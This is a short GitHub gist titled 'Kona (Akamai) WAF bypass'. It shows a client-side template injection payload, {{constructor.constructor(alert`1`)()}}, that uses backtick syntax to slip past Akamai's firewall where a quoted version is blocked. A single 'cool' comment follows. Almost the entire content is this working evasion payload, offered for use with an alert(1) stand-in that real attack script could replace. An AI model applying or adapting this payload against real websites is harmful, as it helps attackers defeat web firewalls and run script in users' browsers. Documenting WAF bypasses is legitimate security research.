Skip to content

Instantly share code, notes, and snippets.

@0xTeles
Created May 17, 2020 11:51
Show Gist options
  • Save 0xTeles/860fd5677d92ba114118b0c1cab58b55 to your computer and use it in GitHub Desktop.
Save 0xTeles/860fd5677d92ba114118b0c1cab58b55 to your computer and use it in GitHub Desktop.
Kona (Akamai) WAF bypass
akamai kona waf bypass with backtrick and client-side template injection.
the payload => {{constructor.constructor('alert(1)')()}} is blocked
but
the payload => {{constructor.constructor(alert`1`)()}} is not
@KaioGomesx
Copy link

cool

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment